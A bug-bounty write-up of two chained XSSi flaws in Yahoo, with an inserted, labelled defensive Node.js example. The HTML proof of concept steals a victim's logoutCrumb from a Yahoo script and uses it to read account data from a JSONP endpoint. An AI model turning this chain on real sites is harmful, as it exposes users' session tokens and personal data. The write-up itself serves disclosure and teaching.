Yahoo — Two XSSi vulnerabilities chained to steal user information. ($750 Bounty)

hyde
Jul 29, 2018 · 3 min read

While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victim's valid .crumb value, I could successfully steal information about their account. I then searched all of the requests I had intercepted in Burp Suite for my own valid crumb and quickly found it in a dynamic JavaScript file located at: https://messenger.yahoo.com/embed/app.js

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people who don't understand how XSSi works: the vulnerability takes advantage of the Same-Origin Policy (SOP) not being applied to the src attribute of a script tag, so a page on any origin can include a script served by another origin and the browser fetches it with the victim's cookies and executes it. I then created the following Proof of Concept, which steals the valid .crumb value from the dynamic JavaScript file at https://messenger.yahoo.com/embed/app.js and then places the valid crumb in the .crumb GET parameter, as seen here: https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx. That request returns a proper response containing information about the user. Using the code below I was able to extract that information:

<html>
<head>
  <title>Yahoo XSSi PoC</title>
</head>
<body>
  <div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
    <h1 style="text-align: center;">Proof of Concept</h1>
    <b>Dataset 1:</b>
    <!-- filled with the JSONP response from device_users -->
    <div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
    <br/>
    <b>Dataset 2:</b>
    <!-- filled with the config object extracted from app.js -->
    <div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
  </div>
  <script>
    // JSONP callback named by the device_users endpoint; receives the user data.
    function processDeviceUsers(data) {
      document.getElementById("content1").innerHTML = JSON.stringify(data);
    }
    // Runs after app.js (included below) has executed in this page.
    window.onload = function () {
      var config = {};
      var config_data = {};
      // app.js hands its configuration, including session.logoutCrumb, to merge().
      config.merge = function (data) { config_data = data; };
      iris.initConfig(config);
      document.getElementById("content2").innerHTML = JSON.stringify(config_data);
      // Second XSSi: load the JSONP endpoint with the stolen crumb as a script.
      var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;
      var s = document.createElement('script');
      s.setAttribute('src', src);
      document.body.appendChild(s);
    };
  </script>
  <!-- First XSSi: the dynamic script that embedded the per-user crumb. -->
  <script src="https://messenger.yahoo.com/embed/app.js"></script>
  <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
</body>
</html>
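For contrast with the PoC, here is an added example (not Yahoo's code and not from the original post) of how a defender would serve the same kind of per-user endpoint so that a cross-site script include gets nothing back. It is plain Node.js with no framework; the cookie name "sid", the session store, the allowed origin and the request objects are constructed assumptions. It goes a little beyond the specific case above by also covering browsers that do not send Fetch Metadata headers.

```javascript
// Added example (not Yahoo's code, not from the original post): a framework-free
// Node.js handler for a per-user data endpoint that refuses to be consumed as a
// cross-site <script> include, which is the capability the PoC above relies on.
// The session store, cookie name "sid", allowed origin and request objects are
// constructed for this example.

const ANTI_XSSI_PREFIX = ")]}',\n";
// Assumption: the only first-party origin allowed to read this endpoint.
const ALLOWED_ORIGINS = new Set(["https://app.example.test"]);

// Constructed session store, keyed by the value of the "sid" cookie.
const SESSIONS = {
  "sid-alice": { user: "alice", devices: ["phone", "laptop"] },
};

function sessionFromCookie(cookieHeader) {
  if (!cookieHeader) return null;
  for (const part of cookieHeader.split(";")) {
    const [name, value] = part.trim().split("=");
    if (name === "sid") return SESSIONS[value] || null;
  }
  return null;
}

// Origin of the requesting document, taken from Origin or, failing that, Referer.
function requestOrigin(headers) {
  if (headers.origin) return headers.origin;
  if (!headers.referer) return null;
  try { return new URL(headers.referer).origin; } catch { return null; }
}

// Decide whether the requesting context may receive per-user data. Sec-Fetch-*
// headers are attached by the browser and cannot be set or changed by page
// script, so a cross-site <script src=...> include is identifiable here.
function isTrustedRequest(headers) {
  if (headers["sec-fetch-dest"] === "script") return false; // never serve as a script
  const site = headers["sec-fetch-site"];
  if (site === "same-origin" || site === "none") return true; // none = user navigation
  if (site === "cross-site") return false;
  // "same-site", or a legacy browser without Fetch Metadata: fall back to the
  // document origin, which a cross-site page cannot forge; absent means untrusted.
  return ALLOWED_ORIGINS.has(requestOrigin(headers));
}

const NO_BODY_HEADERS = { "content-type": "text/plain", "cache-control": "no-store" };

// Hardened counterpart of a JSONP user endpoint: no callback parameter, JSON
// only, nosniff, and an anti-XSSI prefix so the body is a JS syntax error if it
// is ever executed as a script.
function handleDeviceUsers(req) {
  if (!isTrustedRequest(req.headers)) {
    return { status: 403, headers: NO_BODY_HEADERS, body: "" };
  }
  const session = sessionFromCookie(req.headers.cookie);
  if (!session) {
    return { status: 401, headers: NO_BODY_HEADERS, body: "" };
  }
  return {
    status: 200,
    headers: {
      "content-type": "application/json; charset=utf-8",
      "x-content-type-options": "nosniff",
      "cache-control": "no-store",
    },
    body: ANTI_XSSI_PREFIX + JSON.stringify({ user: session.user, devices: session.devices }),
  };
}

// What a legitimate same-origin client does with the response.
function parseProtectedJson(body) {
  if (!body.startsWith(ANTI_XSSI_PREFIX)) throw new Error("missing anti-XSSI prefix");
  return JSON.parse(body.slice(ANTI_XSSI_PREFIX.length));
}

// Stand-alone demo: the two request shapes that matter (constructed headers).
if (typeof require !== "undefined" && require.main === module) {
  const pocInclude = { headers: { "sec-fetch-dest": "script", "sec-fetch-site": "cross-site", cookie: "sid=sid-alice" } };
  const sameOriginFetch = { headers: { "sec-fetch-dest": "empty", "sec-fetch-site": "same-origin", cookie: "sid=sid-alice" } };
  console.log("cross-site <script> include:", handleDeviceUsers(pocInclude).status);
  console.log("same-origin fetch:", parseProtectedJson(handleDeviceUsers(sameOriginFetch).body));
}
```

The same rule closes the first half of the chain: a per-user secret such as the logoutCrumb must never be written into any resource that is loadable through a script src, because SOP does not stop that load. Checking Sec-Fetch-Dest and Sec-Fetch-Site on the server, and returning JSON with nosniff and an anti-XSSI prefix instead of JSONP, removes the second half even for browsers that predate Fetch Metadata, via the Referer fallback.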

Below is a screenshot of the report I submitted to Yahoo, for which I received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write-up.
